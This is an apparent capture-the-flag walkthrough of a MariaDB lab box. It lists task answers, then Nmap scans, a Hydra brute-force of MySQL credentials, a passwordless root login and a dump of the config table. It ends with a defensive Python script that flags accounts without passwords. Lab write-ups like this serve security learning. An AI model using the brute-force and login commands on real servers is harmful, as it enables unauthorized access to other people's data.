Answers
-
Task 1: During our scan, which port do we find serving MySQL?
3306

-
Task 2: What community-developed MySQL version is the target running?
MariaDB

-
Task 3: When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-u

-
Task 4: Which username allows us to log into this MariaDB instance without providing a password?
root

-
Task 5: In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
*

-
Task 6: In SQL, what symbol do we need to end each query with?
;

-
Task 7: There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
htb

The winding road
-
Start with an Nmap scan by running:
nmap -sV TARGET_IP, which ran into a bit of a problem.

-
Change the scan parameters:
nmap -p 3306 -sC TARGET_IP

-
Brute-force the MySQL username and password by running:
hydra -L /usr/share/brutespray/wordlist/mysql/user -P /usr/share/brutespray/wordlist/mysql/password -t 2 -e n -f -v TARGET_IP mysql, which showed that the target uses an empty password.

3.1 I originally wanted to test with Nmap's built-in script, but it failed with an error: nmap -p 3306 --script=mysql-brute TARGET_IP

-
Log in with mysql-client:
mysql -h TARGET_IP -u root

-
List all databases:
show databases;

-
List the tables in the htb database:
use htb; show tables;

-
View the data in the config table:
select * from config;

Hooray!
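
The finding above (root logging in with no password) is something an administrator can check for directly. The following is an added example, not part of the original writeup: it reads a dump of mysql.user and flags accounts that accept an empty password, telling socket-authenticated accounts apart from ones reachable over the network. The column set, the sample rows and the function name audit are assumptions.

```python
"""Flag MariaDB accounts that can log in without a password."""

# Input: tab-separated output of this query, run by an admin on the server
# (column set assumed for MariaDB; MySQL 5.7+ has no Password column):
#   mysql -N -B -e "SELECT User, Host, plugin, Password,
#                   authentication_string FROM mysql.user"
HASH = "*" + "A" * 40  # constructed placeholder, not a real password hash

# Constructed sample rows; not taken from the host in the walkthrough.
SAMPLE = "\n".join([
    "root\tlocalhost\tunix_socket\t\t",          # socket auth, hash not used
    "root\t%\tmysql_native_password\t\t",        # empty password, any host
    f"app\t10.0.0.%\tmysql_native_password\t{HASH}\t{HASH}",
    "backup\tlocalhost\t\tNULL\tNULL",           # legacy row: empty plugin, no hash
])

# Plugins that compare a stored hash; an empty hash means an empty password.
PASSWORD_PLUGINS = {"", "mysql_native_password", "mysql_old_password"}
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def audit(dump):
    """Return (user, host, scope) for passwordless accounts, remote first."""
    findings = []
    for line in dump.splitlines():
        if not line.strip():
            continue
        fields = ["" if f == "NULL" else f for f in line.split("\t")]
        if len(fields) != 5:
            raise ValueError(f"expected 5 columns, got {len(fields)}: {line!r}")
        user, host, plugin, password, auth = fields
        # Other plugins (unix_socket, ed25519, pam, ...) do not use this hash.
        if plugin not in PASSWORD_PLUGINS or password or auth:
            continue
        scope = "local" if host in LOCAL_HOSTS else "remote"
        findings.append((user, host, scope))
    return sorted(findings, key=lambda f: f[2] != "remote")


if __name__ == "__main__":
    for user, host, scope in audit(SAMPLE):
        print(f"[{scope}] '{user}'@'{host}' has no password; "
              "set one with ALTER USER ... IDENTIFIED BY, or drop the account")
```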
